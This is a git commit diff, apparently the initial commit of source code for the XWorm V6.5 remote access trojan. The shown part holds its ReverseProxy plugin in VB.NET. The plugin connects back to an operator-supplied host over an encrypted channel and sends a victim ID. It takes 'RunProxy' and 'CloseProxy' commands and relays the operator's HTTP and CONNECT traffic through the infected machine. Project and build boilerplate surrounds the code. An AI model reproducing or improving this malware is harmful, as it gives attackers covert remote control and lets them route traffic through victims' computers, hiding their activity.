initial commit

This commit is contained in:
i2p
2026-08-27 11:22:34 -06:00
commit 5983c713b1
2676 changed files with 529190 additions and 0 deletions
Binary file not shown.
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2012 for Windows Desktop
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "ReverseProxy", "ReverseProxy\ReverseProxy.vbproj", "{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
Binary file not shown.
@@ -0,0 +1 @@
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\ReverseProxy\\ReverseProxy","ProjectFileName":"ReverseProxy.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[{"SourceFile":"Plugin.vb"},{"SourceFile":"My Project\\AssemblyInfo.vb"},{"SourceFile":"My Project\\Application.Designer.vb"},{"SourceFile":"My Project\\Resources.Designer.vb"},{"SourceFile":"My Project\\Settings.Designer.vb"},{"SourceFile":"ProcessTcpClient.vb"},{"SourceFile":"Proxy.vb"},{"SourceFile":"SSLReadWrite.vb"},{"SourceFile":"obj\\Debug\\.NETFramework,Version=v4.8.AssemblyAttributes.vb"}],"References":[{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Core.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.DataSetExtensions.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.Linq.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""}],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\ReverseProxy.dll","OutputItemRelativePath":"ReverseProxy.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
@@ -0,0 +1,13 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>false</MySubMain>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<ApplicationType>1</ApplicationType>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,35 @@
Imports System
Imports System.Reflection
Imports System.Runtime.InteropServices
' General Information about an assembly is controlled through the following
' set of attributes. Change these attribute values to modify the information
' associated with an assembly.
' Review the values of the assembly attributes
<Assembly: AssemblyTitle("ReverseProxy")>
<Assembly: AssemblyDescription("")>
<Assembly: AssemblyCompany("")>
<Assembly: AssemblyProduct("ReverseProxy")>
<Assembly: AssemblyCopyright("Copyright © 2023")>
<Assembly: AssemblyTrademark("")>
<Assembly: ComVisible(False)>
'The following GUID is for the ID of the typelib if this project is exposed to COM
<Assembly: Guid("5dac38fc-6fdb-478d-b142-5b037159825c")>
' Version information for an assembly consists of the following four values:
'
' Major Version
' Minor Version
' Build Number
' Revision
'
' You can specify all the values or you can default the Build and Revision Numbers
' by using the '*' as shown below:
' <Assembly: AssemblyVersion("1.0.*")>
<Assembly: AssemblyVersion("1.0.0.0")>
<Assembly: AssemblyFileVersion("1.0.0.0")>
@@ -0,0 +1,63 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Imports System
Namespace My.Resources
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Plugin.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set
resourceCulture = value
End Set
End Property
End Module
End Namespace
@@ -0,0 +1,117 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,73 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Partial Friend NotInheritable Class MySettings
Inherits Global.System.Configuration.ApplicationSettingsBase
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
Private Shared addedHandler As Boolean
Private Shared addedHandlerLockObject As New Object
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
If My.Application.SaveMySettingsOnExit Then
My.Settings.Save()
End If
End Sub
#End If
#End Region
Public Shared ReadOnly Property [Default]() As MySettings
Get
#If _MyType = "WindowsForms" Then
If Not addedHandler Then
SyncLock addedHandlerLockObject
If Not addedHandler Then
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
addedHandler = True
End If
End SyncLock
End If
#End If
Return defaultInstance
End Get
End Property
End Class
End Namespace
Namespace My
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
Friend Module MySettingsProperty
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
Friend ReadOnly Property Settings() As Global.Plugin.My.MySettings
Get
Return Global.Plugin.My.MySettings.Default
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,7 @@
<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
<Profiles>
<Profile Name="(Default)" />
</Profiles>
<Settings />
</SettingsFile>
+258
View File
@@ -0,0 +1,258 @@
Imports System.Security.Cryptography
Imports System.IO
Imports System.Net.Sockets
Imports System.Threading
Public Class Plugin
Public Shared T1 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.BeginConnect))
Public Shared T2 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.Ping))
Public Shared Function Run(ByVal H As String, ByVal P As String, ByVal SL As String, ByVal K As String, ByVal id As String)
Try
Settings.Host = H
Settings.Port = P
Settings.SPL = SL
Settings.KEY = K
Settings.IDD = id
T1.Start()
T2.Start()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
End Class
Public Class Settings
Public Shared Host As String
Public Shared Port As String
Public Shared KEY As String
Public Shared SPL As String
Public Shared IDD As String
End Class
Public Class ClientSocket
Public Shared isConnected As Boolean = False
Public Shared S As Socket
Public Shared BufferLength As Long = Nothing
Public Shared Buffer() As Byte
Public Shared MS As New MemoryStream
Public Shared Sub BeginConnect()
S = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
BufferLength = -1
Buffer = New Byte(0) {}
MS = New MemoryStream
S.ReceiveBufferSize = 50 * 1024
S.SendBufferSize = 50 * 1024
Try
S.Connect(Settings.Host, Settings.Port)
isConnected = True
ClientSocket.Send("RevProxy" & Settings.SPL & Settings.IDD)
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Catch ex As Exception
isDisconnected()
End Try
End Sub
Public Shared Sub BeginReceive(ByVal ar As IAsyncResult)
If isConnected = False Then isDisconnected()
Try
Dim Received As Integer = S.EndReceive(ar)
If Received > 0 Then
If BufferLength = -1 Then
If Buffer(0) = 0 Then
BufferLength = BS(MS.ToArray)
MS.Dispose()
MS = New MemoryStream
If BufferLength = 0 Then
BufferLength = -1
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Exit Sub
End If
Buffer = New Byte(BufferLength - 1) {}
Else
MS.WriteByte(Buffer(0))
End If
Else
MS.Write(Buffer, 0, Received)
If (MS.Length = BufferLength) Then
Dim thread = New Thread(AddressOf BeginRead)
thread.Start(MS.ToArray)
BufferLength = -1
MS.Dispose()
MS = New MemoryStream
Buffer = New Byte(0) {}
Else
Buffer = New Byte(BufferLength - MS.Length - 1) {}
End If
End If
Else
isDisconnected()
Exit Sub
End If
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Catch ex As Exception
isDisconnected()
Exit Sub
End Try
End Sub
Public Shared Sub BeginRead(ByVal b As Byte())
Try
Messages.Read(b)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub Send(ByVal msg As String)
Try
Using MS As New MemoryStream
Dim B As Byte() = AES_Encryptor(SB(msg))
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
MS.Write(L, 0, L.Length)
MS.Write(B, 0, B.Length)
S.Poll(-1, SelectMode.SelectWrite)
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
End Using
Catch ex As Exception
isDisconnected()
End Try
End Sub
Public Shared Sub isDisconnected()
isConnected = False
Try
S.Close()
S.Dispose()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
MS.Close()
MS.Dispose()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
tcpClient?.Close()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
Connection.Abort()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
Plugin.T1.Abort()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
Plugin.T2.Abort()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub Ping()
While True
Threading.Thread.Sleep(30 * 1000)
Try
If S.Connected Then
Using MS As New MemoryStream
Dim B As Byte() = AES_Encryptor(SB("PING?"))
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
MS.Write(L, 0, L.Length)
MS.Write(B, 0, B.Length)
S.Poll(-1, SelectMode.SelectWrite)
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
GC.Collect()
End Using
End If
Catch ex As Exception
isDisconnected()
End Try
End While
End Sub
End Class
Public Class Messages
Public Shared Sub Read(ByVal b As Byte())
Try
Dim A As String() = Split(BS(AES_Decryptor(b)), Settings.SPL)
Select Case A(0)
Case "CloseProxy"
ClientSocket.isDisconnected()
Case "RunProxy"
ServerPort = A(1)
ClientHost = A(2)
Connection.Start()
End Select
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
End Class
Module Helper
Function SB(ByVal s As String) As Byte()
Return System.Text.Encoding.UTF8.GetBytes(s)
End Function
Function BS(ByVal b As Byte()) As String
Return System.Text.Encoding.UTF8.GetString(b)
End Function
Function AES_Encryptor(ByVal input As Byte()) As Byte()
Dim AES_ As New RijndaelManaged
Dim Hash As New MD5CryptoServiceProvider
Try
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
AES_.Mode = CipherMode.ECB
Dim DESEncrypter As ICryptoTransform = AES_.CreateEncryptor
Dim Buffer As Byte() = input
Return DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
Function AES_Decryptor(ByVal input As Byte()) As Byte()
Dim AES_ As New RijndaelManaged
Dim Hash As New MD5CryptoServiceProvider
Try
AES_.Key = Hash.ComputeHash(SB(Settings.KEY))
AES_.Mode = CipherMode.ECB
Dim DESDecrypter As ICryptoTransform = AES_.CreateDecryptor
Dim Buffer As Byte() = input
Return DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
End Module
@@ -0,0 +1,184 @@
Imports System
Imports System.Diagnostics
Imports System.IO
Imports System.Net.Sockets
Imports System.Text
Imports System.Threading
Imports System.Windows.Forms
Imports Microsoft.VisualBasic.CompilerServices
Namespace ReverseProxy
' Token: 0x0200000D RID: 13
Friend Module ProcessTcpClient
Public Sub StartClientThread(client As TcpClient)
ProcessTcpClient.ClientThread(CType(client, TcpClient))
End Sub
' Token: 0x06000028 RID: 40 RVA: 0x00002704 File Offset: 0x00000B04
Private Sub ClientThread(client As TcpClient)
Dim stream As NetworkStream
Try
stream = client.GetStream()
Catch ex As Exception
Return
End Try
Dim text As String = ProcessTcpClient.ReadHeader(stream)
Dim flag As Boolean = Operators.CompareString(text, "", False) = 0
If flag Then
client.Close()
Else
flag = (Operators.CompareString(ProcessTcpClient.GetRequestMethod(text), "CONNECT", False) = 0)
If flag Then
Dim hostPort As String() = ProcessTcpClient.GetHostPort(text)
Try
Dim server As TcpClient = New TcpClient(hostPort(0), Conversions.ToInteger(hostPort(1)))
Dim s As String = "HTTP/1.1 200 Connection Established" & vbCrLf & "Connection: Keep-Alive" & vbCrLf & vbCrLf
Dim bytes As Byte() = Encoding.ASCII.GetBytes(s)
stream.Write(bytes, 0, bytes.Length)
stream.Flush()
Dim sslreadWrite As SSLReadWrite = New SSLReadWrite()
SSLReadWrite.StartSSLReadWriteThread(client, stream, server)
Catch ex2 As Exception
client.Close()
End Try
Else
Dim hostPort2 As String() = ProcessTcpClient.GetHostPort(text)
Dim s2 As String = ProcessTcpClient.TurnHeaderToNative(text)
Try
Dim tcpClient As TcpClient = New TcpClient(hostPort2(0), Conversions.ToInteger(hostPort2(1)))
Dim stream2 As NetworkStream = tcpClient.GetStream()
Dim bytes2 As Byte() = Encoding.ASCII.GetBytes(s2)
stream2.Write(bytes2, 0, bytes2.Length)
flag = (Operators.CompareString(ProcessTcpClient.GetRequestMethod(text), "POST", False) = 0)
If flag Then
Dim contentLength As Long = ProcessTcpClient.GetContentLength(text)
Dim num As Long = 0L
Dim array As Byte() = New Byte(8192) {}
While num < contentLength
Dim num2 As Integer = stream.Read(array, 0, array.Length)
stream2.Write(array, 0, num2)
stream2.Flush()
num += CLng(num2)
End While
End If
Dim array2 As Byte() = New Byte(24576) {}
While ClientSocket.isConnected
Dim num3 As Integer = stream2.Read(array2, 0, array2.Length)
flag = (num3 = 0)
If flag Then
stream2.Close()
client.Close()
stream.Close()
tcpClient.Close()
Exit While
End If
stream.Write(array2, 0, num3)
stream.Flush()
End While
Catch ex3 As Exception
client.Close()
stream.Close()
End Try
End If
End If
End Sub
' Token: 0x06000029 RID: 41 RVA: 0x00002A48 File Offset: 0x00000E48
Private Function GetRequestMethod(hdr As String) As String
Return hdr.Substring(0, hdr.IndexOf(" "))
End Function
' Token: 0x0600002A RID: 42 RVA: 0x00002A6C File Offset: 0x00000E6C
Private Function GetContentLength(hdr As String) As Long
Dim flag As Boolean = hdr.ToLower().Contains("content-length")
Dim result As Long
If flag Then
' The following expression was wrapped in a checked-expression
Dim text As String = hdr.Substring(hdr.ToLower().IndexOf("content-length: ") + 16)
text = text.Substring(0, text.IndexOf(vbCrLf))
result = Conversions.ToLong(text)
Else
result = -1L
End If
Return result
End Function
' Token: 0x0600002B RID: 43 RVA: 0x00002AD0 File Offset: 0x00000ED0
Private Function TurnHeaderToNative(hdr As String) As String
Dim text As String = hdr.Substring(0, hdr.IndexOf(vbCrLf))
Dim array As String() = text.Split(New Char() {" "c})
Dim text2 As String = array(1).Substring(7)
Dim flag As Boolean = text2.Contains("/")
If flag Then
text2 = text2.Substring(text2.IndexOf("/"))
Else
text2 = "/"
End If
text = String.Concat(New String() {array(0), " ", text2, " ", array(2)})
text += hdr.Substring(hdr.IndexOf(vbCrLf))
text = text.Replace("keep-alive", "Close")
text = text.Replace("Keep-alive", "Close")
Return text.Replace("Keep-Alive", "Close")
End Function
' Token: 0x0600002C RID: 44 RVA: 0x00002BCC File Offset: 0x00000FCC
Private Function GetHostPort(hdr As String) As String()
Dim text As String = hdr.Substring(0, hdr.IndexOf(vbCrLf))
Dim array As String() = text.Split(New Char() {" "c})
Dim array2 As String() = New String(1) {}
Dim flag As Boolean = text.ToLower().StartsWith("connect")
If flag Then
Dim flag2 As Boolean = array(1).Contains(":")
If flag2 Then
Dim text2 As String = array(1).Substring(0, array(1).IndexOf(":"))
Dim text3 As String = array(1).Substring(array(1).IndexOf(":") + 1)
array2(0) = text2
array2(1) = text3
Else
array2(0) = array(1)
array2(1) = "443"
End If
Else
text = array(1).Substring(array(1).IndexOf("://") + 3)
Dim flag2 As Boolean = text.Contains("/")
If flag2 Then
text = text.Substring(0, text.IndexOf("/"))
End If
flag2 = text.Contains(":")
If flag2 Then
array2(0) = text.Substring(0, text.IndexOf(":"))
array2(1) = text.Substring(text.IndexOf(":") + 1)
Else
array2(0) = text
array2(1) = "80"
End If
End If
Return array2
End Function
' Token: 0x0600002D RID: 45 RVA: 0x00002D20 File Offset: 0x00001120
Private Function ReadHeader(strem As NetworkStream) As String
Dim result As String
Try
Dim array As Byte() = New Byte(0) {}
Dim stringBuilder As StringBuilder = New StringBuilder()
While ClientSocket.isConnected
Dim num As Integer = strem.Read(array, 0, array.Length)
Dim flag As Boolean = num = 0
If flag Then
Exit While
End If
stringBuilder.Append(Encoding.ASCII.GetString(array, 0, num))
flag = stringBuilder.ToString().EndsWith(vbCrLf & vbCrLf)
If flag Then
Exit While
End If
End While
result = stringBuilder.ToString()
Catch ex As Exception
result = ""
End Try
Return result
End Function
End Module
End Namespace
@@ -0,0 +1,28 @@
Imports System.Net.Sockets
Imports System.Text
Imports Microsoft.VisualBasic.CompilerServices
Imports Plugin.ReverseProxy
Module Proxy
Public ServerPort As String
Public ClientHost As String
Public tcpClient As TcpClient
Public Connection As New Threading.Thread(AddressOf OnNotifyBringNewSocket)
Private Sub OnNotifyBringNewSocket()
While ClientSocket.isConnected
Try
tcpClient = New TcpClient(Settings.Host, Conversions.ToInteger(ServerPort))
Dim stream As NetworkStream = tcpClient.GetStream()
Dim bytes As Byte() = Encoding.ASCII.GetBytes("RProxy:" & ClientHost & ":" & ServerPort & vbCrLf & vbCrLf)
stream.Write(bytes, 0, bytes.Length)
stream.Flush()
StartClientThread(tcpClient)
Catch ex As Exception
End Try
End While
End Sub
End Module
@@ -0,0 +1,118 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E9569F4D-D6A9-4651-AD58-26D31BA56D4A}</ProjectGuid>
<OutputType>Library</OutputType>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>ReverseProxy</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>Windows</MyType>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>false</DebugSymbols>
<DebugType>none</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<OptionExplicit>On</OptionExplicit>
</PropertyGroup>
<PropertyGroup>
<OptionCompare>Binary</OptionCompare>
</PropertyGroup>
<PropertyGroup>
<OptionStrict>Off</OptionStrict>
</PropertyGroup>
<PropertyGroup>
<OptionInfer>On</OptionInfer>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Diagnostics" />
<Import Include="System.Linq" />
<Import Include="System.Xml.Linq" />
<Import Include="System.Threading.Tasks" />
</ItemGroup>
<ItemGroup>
<Compile Include="Plugin.vb" />
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<Compile Include="My Project\Resources.Designer.vb">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="My Project\Settings.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
<Compile Include="ProcessTcpClient.vb" />
<Compile Include="Proxy.vb" />
<Compile Include="SSLReadWrite.vb" />
</ItemGroup>
<ItemGroup>
